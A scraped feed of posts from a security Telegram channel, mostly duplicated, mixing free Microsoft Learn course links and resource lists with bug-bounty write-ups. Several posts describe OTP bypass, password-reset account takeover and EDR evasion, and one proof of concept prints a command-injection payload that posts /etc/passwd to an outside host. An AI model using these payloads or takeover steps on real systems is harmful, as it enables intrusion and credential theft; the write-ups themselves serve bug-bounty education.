π¦2025 FREE Certification Courses!
No Fee, No Subscription, No Registration Required, Just Start Learning.
These Courses Includes Video Lectures, Tutorial and Easy Notes.
All courses are from the Microsoft Learn platform.
Microsoft Learn
.
1-Microsoft Azure Administrator
- Course AZ-104T00
- Course Link: https://lnkd.in/dUEGRTgq
2-Configuring and Operating Microsoft Azure Virtual Desktop
- Course AZ-140
- Course Link: https://lnkd.in/dWCUPjTC
3-Designing Microsoft Azure Infrastructure Solutions
- Course AZ-305T00
- Course Link: https://lnkd.in/dmvHyJ_z
4-Developing Solutions for Microsoft Azure
- Course AZ-204T00
- Course Link:https://lnkd.in/dtfBZBN6
5-Designing and Implementing Microsoft DevOps solutions
- Course AZ-400T00
- Course Link:https://lnkd.in/drCiHKgM
6-Designing and Implementing a Microsoft Azure AI Solution
- Course AI-102T00
- Course Link: https://lnkd.in/ducvr87J
7-Develop Generative AI Solutions with Azure OpenAI Service
- Course AI-050T00
- Course Link: https://lnkd.in/dJFW_PgR
8- Microsoft Security, Compliance, and Identity Fundamentals
- Course SC-900T00
- Course Link: https://lnkd.in/dRgx4EKG
9- Data Engineering on Microsoft Azure
- Course DP-203T00
- Course Link: https://lnkd.in/dSU6QmgT
10-Microsoft Security Operations Analyst
- Course SC-200T00
- Course Link: https://lnkd.in/d2EYRJph
11- Designing and Implementing Microsoft Azure Networking Solutions
- Course AZ-700T00
- Course Link: https://lnkd.in/dhDBjPaK
12-Designing and implementing a data science solution on Azure
- Course DP-100T01
- Course Link: https://lnkd.in/dUsB4GS6
13-Administering Microsoft Azure SQL Solutions
- Course DP-300T00
- Course Link:https://lnkd.in/d-5CzTDz
14-Microsoft Cybersecurity Architect
- Course SC-100T00
- Course Link: https://lnkd.in/dRhNSNsQ
15-Microsoft Azure Security Technologies
- Course AZ-500T00
- Course Link:https://lnkd.in/dPARyEZB
16-Azure Support Engineer Troubleshooting Azure Connectivity
- Course AZ-720T00
- Course Link: https://lnkd.in/d87-6RmC
17-Administering Windows Server Hybrid Core Infrastructure
- Course AZ-800T00
- Course Link:https://lnkd.in/dimC-puE
18-Configuring Windows Server Hybrid Advanced Services
- Course AZ-801T00
-Course Link:https://lnkd.in/dmXNAtP5
Ref: Shahzad MS
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
No Fee, No Subscription, No Registration Required, Just Start Learning.
These Courses Includes Video Lectures, Tutorial and Easy Notes.
All courses are from the Microsoft Learn platform.
Microsoft Learn
.
1-Microsoft Azure Administrator
- Course AZ-104T00
- Course Link: https://lnkd.in/dUEGRTgq
2-Configuring and Operating Microsoft Azure Virtual Desktop
- Course AZ-140
- Course Link: https://lnkd.in/dWCUPjTC
3-Designing Microsoft Azure Infrastructure Solutions
- Course AZ-305T00
- Course Link: https://lnkd.in/dmvHyJ_z
4-Developing Solutions for Microsoft Azure
- Course AZ-204T00
- Course Link:https://lnkd.in/dtfBZBN6
5-Designing and Implementing Microsoft DevOps solutions
- Course AZ-400T00
- Course Link:https://lnkd.in/drCiHKgM
6-Designing and Implementing a Microsoft Azure AI Solution
- Course AI-102T00
- Course Link: https://lnkd.in/ducvr87J
7-Develop Generative AI Solutions with Azure OpenAI Service
- Course AI-050T00
- Course Link: https://lnkd.in/dJFW_PgR
8- Microsoft Security, Compliance, and Identity Fundamentals
- Course SC-900T00
- Course Link: https://lnkd.in/dRgx4EKG
9- Data Engineering on Microsoft Azure
- Course DP-203T00
- Course Link: https://lnkd.in/dSU6QmgT
10-Microsoft Security Operations Analyst
- Course SC-200T00
- Course Link: https://lnkd.in/d2EYRJph
11- Designing and Implementing Microsoft Azure Networking Solutions
- Course AZ-700T00
- Course Link: https://lnkd.in/dhDBjPaK
12-Designing and implementing a data science solution on Azure
- Course DP-100T01
- Course Link: https://lnkd.in/dUsB4GS6
13-Administering Microsoft Azure SQL Solutions
- Course DP-300T00
- Course Link:https://lnkd.in/d-5CzTDz
14-Microsoft Cybersecurity Architect
- Course SC-100T00
- Course Link: https://lnkd.in/dRhNSNsQ
15-Microsoft Azure Security Technologies
- Course AZ-500T00
- Course Link:https://lnkd.in/dPARyEZB
16-Azure Support Engineer Troubleshooting Azure Connectivity
- Course AZ-720T00
- Course Link: https://lnkd.in/d87-6RmC
17-Administering Windows Server Hybrid Core Infrastructure
- Course AZ-800T00
- Course Link:https://lnkd.in/dimC-puE
18-Configuring Windows Server Hybrid Advanced Services
- Course AZ-801T00
-Course Link:https://lnkd.in/dmXNAtP5
Ref: Shahzad MS
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
lnkd.in
LinkedIn
This link will take you to a page thatβs not on LinkedIn
Media is too big
VIEW IN TELEGRAM
π¦ Bypassing CrowdStrike EDR with Hookchain and Custom Shellcode π¨
π Key Points:
- Utilizing the Hookchain technique for evasion of detection.
- Designing custom shellcode for discreet execution.
- Illustrating the necessity for robust detection methods surpassing traditional EDR capabilities.
This experiment sheds light on critical vulnerabilities that sophisticated attackers could exploit, emphasizing the significance of embracing multi-layered security approaches.
π‘οΈ Disclaimer: This exploration serves solely for educational purposes, aiming to deepen comprehension of EDR bypass strategies for enhanced defense mechanisms. The primary objective? Strengthening cybersecurity infrastructures.
Ref: Ammar. A
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π Key Points:
- Utilizing the Hookchain technique for evasion of detection.
- Designing custom shellcode for discreet execution.
- Illustrating the necessity for robust detection methods surpassing traditional EDR capabilities.
This experiment sheds light on critical vulnerabilities that sophisticated attackers could exploit, emphasizing the significance of embracing multi-layered security approaches.
π‘οΈ Disclaimer: This exploration serves solely for educational purposes, aiming to deepen comprehension of EDR bypass strategies for enhanced defense mechanisms. The primary objective? Strengthening cybersecurity infrastructures.
Ref: Ammar. A
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Broken Access Control: From Password Reset to Mass Account Takeover
A critical vulnerability in the password reset functionality of an API endpoint (/api/u/resetPwd). Hereβs how it unfolded:
1οΈβ£ The endpoint accepts a username parameter and sends a password reset link to the user's email.
2οΈβ£ The use of "u" in the endpoint (u=user) hinted that other roles like admin (a=admin) or superuser (su) might exist.
3οΈβ£ Attempts to reset admin passwords via /api/admin/resetPwd and /api/administrator/resetPwd failed.
4οΈβ£ However, /api/su/resetPwd worked, allowing me to reset the superuser password!
5οΈβ£ The reset mechanism generated predictable passwords like username + ab12*. For example, resetting for admin resulted in adminab12*.
π― Impact: This flaw allowed unauthorized access to critical accounts, leading to mass account takeover.
Ref: Amit Kumar
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
A critical vulnerability in the password reset functionality of an API endpoint (/api/u/resetPwd). Hereβs how it unfolded:
1οΈβ£ The endpoint accepts a username parameter and sends a password reset link to the user's email.
2οΈβ£ The use of "u" in the endpoint (u=user) hinted that other roles like admin (a=admin) or superuser (su) might exist.
3οΈβ£ Attempts to reset admin passwords via /api/admin/resetPwd and /api/administrator/resetPwd failed.
4οΈβ£ However, /api/su/resetPwd worked, allowing me to reset the superuser password!
5οΈβ£ The reset mechanism generated predictable passwords like username + ab12*. For example, resetting for admin resulted in adminab12*.
π― Impact: This flaw allowed unauthorized access to critical accounts, leading to mass account takeover.
Ref: Amit Kumar
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Anti Forensic Techniques Repositories #1
Anti Forensic Techniques
https://lnkd.in/dWmF3ikg
Awesome Anti Forensic by Shadawck
https://lnkd.in/dm2MFpV6
Anti Forensic Techniques by Hacktricks
https://lnkd.in/dimT7PJb
Windows Anti Forensic Script by MikeHorn
https://lnkd.in/d2h39Kg2
Anti Forensic Detection Tool by kuritsutianu
https://lnkd.in/dq4-7T9m
Anti Forensics Tool For Red Teamers by PaulNorman01
https://lnkd.in/d9A7t_Tx
AntiForensic.NET :: Windows anti-forensics made easy by hsheric0210
https://lnkd.in/dMsRJRYR
Anti Forensic Study by CCDCOE
https://lnkd.in/djhFgdqz
Ref: Joas A Santos
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Anti Forensic Techniques
https://lnkd.in/dWmF3ikg
Awesome Anti Forensic by Shadawck
https://lnkd.in/dm2MFpV6
Anti Forensic Techniques by Hacktricks
https://lnkd.in/dimT7PJb
Windows Anti Forensic Script by MikeHorn
https://lnkd.in/d2h39Kg2
Anti Forensic Detection Tool by kuritsutianu
https://lnkd.in/dq4-7T9m
Anti Forensics Tool For Red Teamers by PaulNorman01
https://lnkd.in/d9A7t_Tx
AntiForensic.NET :: Windows anti-forensics made easy by hsheric0210
https://lnkd.in/dMsRJRYR
Anti Forensic Study by CCDCOE
https://lnkd.in/djhFgdqz
Ref: Joas A Santos
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Awesome Security - A collection of awesome software, libraries, documents, books, and resources about security.
πhttps://lnkd.in/dGb2hzyY
Awesome Web Security - Web Security materials and resources for cutting-edge penetration techniques.
πhttps://lnkd.in/d3kxd9ik
βοΈAwesome Machine Learning for Cyber Security Tools and resources on machine learning for cybersecurity.
πhttps://lnkd.in/dZPtJmXV
βοΈawesome-web-hacking - Resources for learning about web application security.
πhttps://lnkd.in/dqmeXsgj
βοΈawesome-mobile-security - Maintained by @vaib25vicky with contributions from the security and developer communities.
πhttps://lnkd.in/dbbvfeYT
βοΈawesome-threat-intelligence - A curated list of awesome Threat Intelligence resources.
πhttps://lnkd.in/dSPyZAQn
awesome-security-hardening - Collection of security hardening guides, best practices, and tools.
πhttps://lnkd.in/de_PyRxH
security-hardening
βοΈAwesome Cyber Security - A collection of software, libraries, documents, and resources about security.
πhttps://lnkd.in/dXztUHKk
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
πhttps://lnkd.in/dGb2hzyY
Awesome Web Security - Web Security materials and resources for cutting-edge penetration techniques.
πhttps://lnkd.in/d3kxd9ik
βοΈAwesome Machine Learning for Cyber Security Tools and resources on machine learning for cybersecurity.
πhttps://lnkd.in/dZPtJmXV
βοΈawesome-web-hacking - Resources for learning about web application security.
πhttps://lnkd.in/dqmeXsgj
βοΈawesome-mobile-security - Maintained by @vaib25vicky with contributions from the security and developer communities.
πhttps://lnkd.in/dbbvfeYT
βοΈawesome-threat-intelligence - A curated list of awesome Threat Intelligence resources.
πhttps://lnkd.in/dSPyZAQn
awesome-security-hardening - Collection of security hardening guides, best practices, and tools.
πhttps://lnkd.in/de_PyRxH
security-hardening
βοΈAwesome Cyber Security - A collection of software, libraries, documents, and resources about security.
πhttps://lnkd.in/dXztUHKk
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
lnkd.in
LinkedIn
This link will take you to a page thatβs not on LinkedIn
π¦OTP Bypass on Register account via Response manipulation:
1. First Method
1. Register account with mobile number and request for OTP.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be
{"verificationStatus": false, "mobile": 9072346577", "profileld": "84673832"}
5. Change this response to
{"verificationStatus": true, "mobile": 9072346577", "profileId": "84673832" }
6. And forward the response.
7. You will be logged in to the account.
Impact: Account Takeover
2. Second Method.
1. Go to login and wait for OTP pop up.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be <error>
5. Change this response to
success
6. And forward the response.
Ref: Het Vikam
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
1. First Method
1. Register account with mobile number and request for OTP.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be
{"verificationStatus": false, "mobile": 9072346577", "profileld": "84673832"}
5. Change this response to
{"verificationStatus": true, "mobile": 9072346577", "profileId": "84673832" }
6. And forward the response.
7. You will be logged in to the account.
Impact: Account Takeover
2. Second Method.
1. Go to login and wait for OTP pop up.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be <error>
5. Change this response to
success
6. And forward the response.
Ref: Het Vikam
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Bypass Login Prompts on Instagram & Pinterest! #OSINT
π #OSINT Protip 9 by KartikHunt3r:
If you didnβt know about this trick before, you should now! Thereβs a simple way to bypass the login prompt when scrolling through an Instagram profile. This technique also works with Pinterest.
π Protip: By using this method, you can view profiles and posts without needing to log in, saving time and keeping your research anonymous.
π‘ This can be incredibly useful for OSINT investigations when you want to gather public data without the need for creating accounts or logging in.
Stay tuned for more helpful tips in my #OSINT Seriesβenhancing your digital investigation skills! π
π¬ Found this tip helpful? Like, share, and follow for more OSINT hacks!
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π #OSINT Protip 9 by KartikHunt3r:
If you didnβt know about this trick before, you should now! Thereβs a simple way to bypass the login prompt when scrolling through an Instagram profile. This technique also works with Pinterest.
π Protip: By using this method, you can view profiles and posts without needing to log in, saving time and keeping your research anonymous.
π‘ This can be incredibly useful for OSINT investigations when you want to gather public data without the need for creating accounts or logging in.
Stay tuned for more helpful tips in my #OSINT Seriesβenhancing your digital investigation skills! π
π¬ Found this tip helpful? Like, share, and follow for more OSINT hacks!
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
UNDERCODE TESTING
π¦Bypass Login Prompts on Instagram & Pinterest! #OSINT π #OSINT Protip 9 by KartikHunt3r: If you didnβt know about this trick before, you should now! Thereβs a simple way to bypass the login prompt when scrolling through an Instagram profile. This techniqueβ¦
π¦ They may patch this for Instagram at any time, but this tip can be used for many other websites.
This media is not supported in your browser
VIEW IN TELEGRAM
π¦Live Bug Bounty :
Welcome to HackWithRohit, your go-to channel for bug bounty and cybersecurity insights! π In todayβs video, weβre diving deep into an advanced vulnerability chain: Reverse Tabnabbing leading to Cross-Site Scripting (XSS).
π What Youβll Learn in This Video
1οΈβ£ What is Reverse Tabnabbing?
Explore how attackers manipulate the target="_blank" attribute to take control of a user's previously trusted page.
Understand how this technique works and its implications.
2οΈβ£ How Does It Lead to XSS?
Step-by-step walkthrough of leveraging Reverse Tabnabbing to inject malicious scripts.
Real-world example: Injecting an XSS payload through hijacked pages.
Ref: Rohith S.
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Welcome to HackWithRohit, your go-to channel for bug bounty and cybersecurity insights! π In todayβs video, weβre diving deep into an advanced vulnerability chain: Reverse Tabnabbing leading to Cross-Site Scripting (XSS).
π What Youβll Learn in This Video
1οΈβ£ What is Reverse Tabnabbing?
Explore how attackers manipulate the target="_blank" attribute to take control of a user's previously trusted page.
Understand how this technique works and its implications.
2οΈβ£ How Does It Lead to XSS?
Step-by-step walkthrough of leveraging Reverse Tabnabbing to inject malicious scripts.
Real-world example: Injecting an XSS payload through hijacked pages.
Ref: Rohith S.
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦POC steps:
01: I visit my target, I see my target, and I send a POST request to /v1/api HTTP/1.
02: I add this for getting the server location and other information. I replace with my Burp collaborator:
action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+https://lnkd.in/dyhGdqi2)
04: After sending the request, I see the response: "return":false,"reason":"Syntax error!"
05: In Burp collaborator, I can see the server's /etc/passwd file.
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
01: I visit my target, I see my target, and I send a POST request to /v1/api HTTP/1.
02: I add this for getting the server location and other information. I replace with my Burp collaborator:
action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+https://lnkd.in/dyhGdqi2)
04: After sending the request, I see the response: "return":false,"reason":"Syntax error!"
05: In Burp collaborator, I can see the server's /etc/passwd file.
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π
πππ πππππππππ - πππππ πππππ πππ
ππππππππ ππππππππ
Check out Black Hills Information Security for top-notch cybersecurity content created by experts in the field. Their informative and engaging videos cover a range of topics, from the latest threats and vulnerabilities to strategies for protecting your systems and data.
π ππ¨πππ π¬π’π¨π₯ ππ’π π πππ
π How to Build a Home Lab for Infosec - Ralph May
http://ow.ly/ynS650NKLlS
π π‘ππ§πͺπ’π₯π π¦πππ¨π₯ππ§π¬
π Networking for Pentesters: Beginner - Serena D.
http://ow.ly/CpgS50NKLlZ
π π£ππ‘π§ππ¦π§ππ‘π
π Introduction to Pentesting - Mike Felch
http://ow.ly/RVWX50NKLm0
π Pentester Tactics, Techniques, and Procedures TTPs - Chris Traynor
http://ow.ly/BnMK50NKLlK
π πͺππ ππ£π£πππππ§ππ’π‘ ππ‘π ππ¨π₯π£ π¦π¨ππ§π
π Getting Started with Burp Suite & Webapp Pentesting - BB King
http://ow.ly/7yv750NKLlP
π Modern Webapp Pentesting: How to Attack a JWT - BB King
http://ow.ly/F37650NKLlQ
π Basics of Burp(ing) for Testing Web App Security - Chris Traynor
http://ow.ly/nvMO50NKLlW
π ππ π£π₯π’π©π π¬π’π¨π₯ π£ππ‘π§ππ¦π§ π₯ππ£π’π₯π§π¦
π Things NOT to Do in Pentest Reports - Bronwen Aker
http://ow.ly/g3KP50NKLlV
π π₯ππ π§πππ ππ‘π
π Atomic Red Team Hands on Getting Started Guide - Carrie & Darin Roberts
http://ow.ly/mzfG50NKLm2
π OPSEC Fundamentals for Remote Red Teams - Michael Allen
http://ow.ly/sni250NKLlN
π πππ’π¨π π£ππ‘π§ππ¦π§
π Get your head in the Clouds - Sean Verity
http://ow.ly/m4aM50NKLlI
π Azure Console Pivoting 101 - Stephen Borosh
http://ow.ly/foGR50NKLlJ
π Securing AWS Discover Cloud Vulnerabilities - Beau Bullock
http://ow.ly/pUyH50NKLlY
π πͺπππ―
π Getting Started in Blockchain Security and Smart Contract Auditing - Beau Bullock
http://ow.ly/YSLC50NKLlO
π Demystifying Web3 Attack Vectors - Beau Bullock & Steve Borosh
http://ow.ly/sWrv50NKLlT
π ππ’π ππ¨π‘π§ππ‘π
π How to Hunt for Jobs like a Hacker - Jason Blanchard
http://ow.ly/pzik50NKLlX
π Infosec Job Hunting (Part 1)
http://ow.ly/4THW50NKLm1
π ππ’π‘π¨π¦
π Have fun with the PROMPT# Zines
http://ow.ly/BYt450NKLlU
Post Credit : Gabrielle
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Check out Black Hills Information Security for top-notch cybersecurity content created by experts in the field. Their informative and engaging videos cover a range of topics, from the latest threats and vulnerabilities to strategies for protecting your systems and data.
π ππ¨πππ π¬π’π¨π₯ ππ’π π πππ
π How to Build a Home Lab for Infosec - Ralph May
http://ow.ly/ynS650NKLlS
π π‘ππ§πͺπ’π₯π π¦πππ¨π₯ππ§π¬
π Networking for Pentesters: Beginner - Serena D.
http://ow.ly/CpgS50NKLlZ
π π£ππ‘π§ππ¦π§ππ‘π
π Introduction to Pentesting - Mike Felch
http://ow.ly/RVWX50NKLm0
π Pentester Tactics, Techniques, and Procedures TTPs - Chris Traynor
http://ow.ly/BnMK50NKLlK
π πͺππ ππ£π£πππππ§ππ’π‘ ππ‘π ππ¨π₯π£ π¦π¨ππ§π
π Getting Started with Burp Suite & Webapp Pentesting - BB King
http://ow.ly/7yv750NKLlP
π Modern Webapp Pentesting: How to Attack a JWT - BB King
http://ow.ly/F37650NKLlQ
π Basics of Burp(ing) for Testing Web App Security - Chris Traynor
http://ow.ly/nvMO50NKLlW
π ππ π£π₯π’π©π π¬π’π¨π₯ π£ππ‘π§ππ¦π§ π₯ππ£π’π₯π§π¦
π Things NOT to Do in Pentest Reports - Bronwen Aker
http://ow.ly/g3KP50NKLlV
π π₯ππ π§πππ ππ‘π
π Atomic Red Team Hands on Getting Started Guide - Carrie & Darin Roberts
http://ow.ly/mzfG50NKLm2
π OPSEC Fundamentals for Remote Red Teams - Michael Allen
http://ow.ly/sni250NKLlN
π πππ’π¨π π£ππ‘π§ππ¦π§
π Get your head in the Clouds - Sean Verity
http://ow.ly/m4aM50NKLlI
π Azure Console Pivoting 101 - Stephen Borosh
http://ow.ly/foGR50NKLlJ
π Securing AWS Discover Cloud Vulnerabilities - Beau Bullock
http://ow.ly/pUyH50NKLlY
π πͺπππ―
π Getting Started in Blockchain Security and Smart Contract Auditing - Beau Bullock
http://ow.ly/YSLC50NKLlO
π Demystifying Web3 Attack Vectors - Beau Bullock & Steve Borosh
http://ow.ly/sWrv50NKLlT
π ππ’π ππ¨π‘π§ππ‘π
π How to Hunt for Jobs like a Hacker - Jason Blanchard
http://ow.ly/pzik50NKLlX
π Infosec Job Hunting (Part 1)
http://ow.ly/4THW50NKLm1
π ππ’π‘π¨π¦
π Have fun with the PROMPT# Zines
http://ow.ly/BYt450NKLlU
Post Credit : Gabrielle
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
YouTube
How to Build a Home Lab for Infosec with Ralph May | 1 Hour
π Register for webcasts, summits, and workshops -
https://poweredbybhis.com
Join us in the Black Hills InfoSec Discord server here: https://discord.gg/BHIS to keep the security conversation going!
π Learn penetration testing with Ralph May from Antisyphonβ¦
https://poweredbybhis.com
Join us in the Black Hills InfoSec Discord server here: https://discord.gg/BHIS to keep the security conversation going!
π Learn penetration testing with Ralph May from Antisyphonβ¦
π¦The Ultimate IDOR Testing Checklist!
Are you testing for Insecure Direct Object References (IDOR) vulnerabilities? Here's a detailed checklist to ensure nothing slips through the cracks.
This comprehensive list covers everything from:
β Testing parameter pollution
β Exploring API versions and extensions
β Swapping GUIDs with numeric IDs
β Bypassing 403/401 responses
β Blind IDORs and chaining with XSS for account takeovers
Whether you're a bug bounty hunter, pentester, or security enthusiast, this checklist will help you uncover those hidden vulnerabilities and secure applications effectively.
Ref: Amit Kumar
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Are you testing for Insecure Direct Object References (IDOR) vulnerabilities? Here's a detailed checklist to ensure nothing slips through the cracks.
This comprehensive list covers everything from:
β Testing parameter pollution
β Exploring API versions and extensions
β Swapping GUIDs with numeric IDs
β Bypassing 403/401 responses
β Blind IDORs and chaining with XSS for account takeovers
Whether you're a bug bounty hunter, pentester, or security enthusiast, this checklist will help you uncover those hidden vulnerabilities and secure applications effectively.
Ref: Amit Kumar
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
SIMULATION FOR
CYBERSECURITY
ANALYST POSITION.pdf
CYBERSECURITY
ANALYST POSITION.pdf
238 KB
π¦"Interview Simulation For Cybersecurity Analyst Position (L1, L2, L3) From Various Background Complete With ATS Resume Examples". In this document, I have prepared six different career backgrounds for individuals seeking a cybersecurity analyst role, whether they are transitioning from another field or moving from L1 to L2 or L3 positions. Additionally, I have provided interview simulations for each job application, along with tailored ATS-optimised resumes.
This media is not supported in your browser
VIEW IN TELEGRAM
π¦User Automation Process Using CSV:
1- Create the CSV Script
Begin by creating a CSV file with the following headers:
{DN,ObjectClass,SamAccountName,UserPrincipalName,Description,UserAccountName,DisplayName}
2- Fill in the Data
Below the headers, enter the required user details. Each line should represent a user in this format:
{"CN=User1,OU=IT,DC=company,DC=com",user,User1,user1@company.com,"IT Specialist","User1",514,"User One"
"CN=User2,OU=Sales,DC=company,DC=com",user,User2,user2@company.com,"Sales Representative","User2",514,"User Two"}
3- Save the File
Once all user data is filled in, save the file with a .csv extension
Example filename: users.csv
4- Import the Users
To import the users, open PowerShell and run the following command
{csvde -i -f "C:\path\to\your\users.csv"}
5- Enable the Accounts
After importing, all accounts will be disabled by default. To enable them:
Reset their passwords.
Use PowerShell commands to enable the accounts.
Mossad Hamady
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
1- Create the CSV Script
Begin by creating a CSV file with the following headers:
{DN,ObjectClass,SamAccountName,UserPrincipalName,Description,UserAccountName,DisplayName}
2- Fill in the Data
Below the headers, enter the required user details. Each line should represent a user in this format:
{"CN=User1,OU=IT,DC=company,DC=com",user,User1,user1@company.com,"IT Specialist","User1",514,"User One"
"CN=User2,OU=Sales,DC=company,DC=com",user,User2,user2@company.com,"Sales Representative","User2",514,"User Two"}
3- Save the File
Once all user data is filled in, save the file with a .csv extension
Example filename: users.csv
4- Import the Users
To import the users, open PowerShell and run the following command
{csvde -i -f "C:\path\to\your\users.csv"}
5- Enable the Accounts
After importing, all accounts will be disabled by default. To enable them:
Reset their passwords.
Use PowerShell commands to enable the accounts.
Mossad Hamady
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Ngrok β Simplified Tunneling.
ngrok is a game-changing tool that bridges the gap between your local machine and the online world by exposing local servers to the internet through secure tunnels.
π What Makes Ngrok a Must-Have Tool?
1οΈβ£ Simplified Local Tunneling
Ngrok allows you to expose a local server to the internet in seconds. Say goodbye to complex port forwarding configurations or NAT headaches.
2οΈβ£ Secure Tunnels
With built-in TLS encryption, Ngrok ensures your data travels securely between endpoints. No more worrying about unencrypted connections when demonstrating or testing sensitive applications.
3οΈβ£ Dynamic Subdomains
Easily share your application with temporary, unique URLs that expire after use. Perfect for one-time demos or testing.
4οΈβ£ Webhook Testing Made Easy
Debugging webhook integrations has never been simpler. Ngrok allows you to view detailed request logs and replay them for testing.
5οΈβ£ Remote Collaboration
Showcase your development or simulations to remote teams without deploying to production. Whether itβs a cybersecurity simulation or an app prototype, Ngrok is your go-to solution.
π§ How to Get Started with Ngrok
1οΈβ£ Install Ngrok
Download and install Ngrok from the official website:
π https:// ngrok.com /download
For Linux, run:
sudo apt install ngrok
2οΈβ£ Sign Up for Free or Pro Plan
Ngrokβs free plan offers basic tunneling, while the Pro plan unlocks advanced features like custom subdomains and reserved addresses.
3οΈβ£ Expose Your Local Server
Run your local app (e.g., on port 5000):
python -m http.server 5000
Start the Ngrok tunnel:
ngrok http 5000
Ngrok will generate a public URL (e.g., https://1234.ngrok.io) that maps to your local server. Share this URL to let others access your app!
π When You Need a Public IP
Ngrok is great for quick and easy access to your local applications, but for real-world penetration testing, youβll eventually need a dedicated public IP address for activities like remote shell connections or long-term access.
Personally, I use AWS servers to run my virtual machines with public IP addresses. AWS provides an ideal environment for hosting pentesting tools, enabling you to maintain persistent access during engagements.
For example:
β’ If youβre delivering a reverse shell, having a public IP is crucial to ensure the shell connects back to your system.
β’ AWS Elastic IPs make it easy to assign a static public IP, which is highly reliable for pentesting setups.
Have you used AWS servers or Ngrok in your pentesting or development setups? π
Andrew P.
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
ngrok is a game-changing tool that bridges the gap between your local machine and the online world by exposing local servers to the internet through secure tunnels.
π What Makes Ngrok a Must-Have Tool?
1οΈβ£ Simplified Local Tunneling
Ngrok allows you to expose a local server to the internet in seconds. Say goodbye to complex port forwarding configurations or NAT headaches.
2οΈβ£ Secure Tunnels
With built-in TLS encryption, Ngrok ensures your data travels securely between endpoints. No more worrying about unencrypted connections when demonstrating or testing sensitive applications.
3οΈβ£ Dynamic Subdomains
Easily share your application with temporary, unique URLs that expire after use. Perfect for one-time demos or testing.
4οΈβ£ Webhook Testing Made Easy
Debugging webhook integrations has never been simpler. Ngrok allows you to view detailed request logs and replay them for testing.
5οΈβ£ Remote Collaboration
Showcase your development or simulations to remote teams without deploying to production. Whether itβs a cybersecurity simulation or an app prototype, Ngrok is your go-to solution.
π§ How to Get Started with Ngrok
1οΈβ£ Install Ngrok
Download and install Ngrok from the official website:
π https:// ngrok.com /download
For Linux, run:
sudo apt install ngrok
2οΈβ£ Sign Up for Free or Pro Plan
Ngrokβs free plan offers basic tunneling, while the Pro plan unlocks advanced features like custom subdomains and reserved addresses.
3οΈβ£ Expose Your Local Server
Run your local app (e.g., on port 5000):
python -m http.server 5000
Start the Ngrok tunnel:
ngrok http 5000
Ngrok will generate a public URL (e.g., https://1234.ngrok.io) that maps to your local server. Share this URL to let others access your app!
π When You Need a Public IP
Ngrok is great for quick and easy access to your local applications, but for real-world penetration testing, youβll eventually need a dedicated public IP address for activities like remote shell connections or long-term access.
Personally, I use AWS servers to run my virtual machines with public IP addresses. AWS provides an ideal environment for hosting pentesting tools, enabling you to maintain persistent access during engagements.
For example:
β’ If youβre delivering a reverse shell, having a public IP is crucial to ensure the shell connects back to your system.
β’ AWS Elastic IPs make it easy to assign a static public IP, which is highly reliable for pentesting setups.
Have you used AWS servers or Ngrok in your pentesting or development setups? π
Andrew P.
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Just Released: A comprehensive Active Directory threat hunting tool that makes detecting suspicious activities easier than ever!
β¨ Key Features:
β’ Real-time attack detection
β’ Advanced timing analysis
β’ Pattern recognition
β’ Multi-format reporting (CSV/JSON/HTML)
β’ Built-in attack simulation
π Detects:
β’ Password spray attacks
β’ Brute force attempts
β’ Account lockouts
β’ Off-hours activity
β’ Geographically impossible logins
β’ Service account misuse
β’ Admin account abuse
β‘οΈ Smart Analysis:
β’ Time-based attack correlation
β’ Activity pattern matching
β’ User behavior analysis
β’ Configurable business hours
β’ Customizable thresholds
π§ͺ Includes Test Framework:
β’ Simulate various attack scenarios
β’ Validate detection capabilities
β’ Test environment readiness
β’ Verify audit policies
π Get started: https://lnkd.in/gbuaaswB
Michael H.
@UndercodeCommunity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β¨ Key Features:
β’ Real-time attack detection
β’ Advanced timing analysis
β’ Pattern recognition
β’ Multi-format reporting (CSV/JSON/HTML)
β’ Built-in attack simulation
π Detects:
β’ Password spray attacks
β’ Brute force attempts
β’ Account lockouts
β’ Off-hours activity
β’ Geographically impossible logins
β’ Service account misuse
β’ Admin account abuse
β‘οΈ Smart Analysis:
β’ Time-based attack correlation
β’ Activity pattern matching
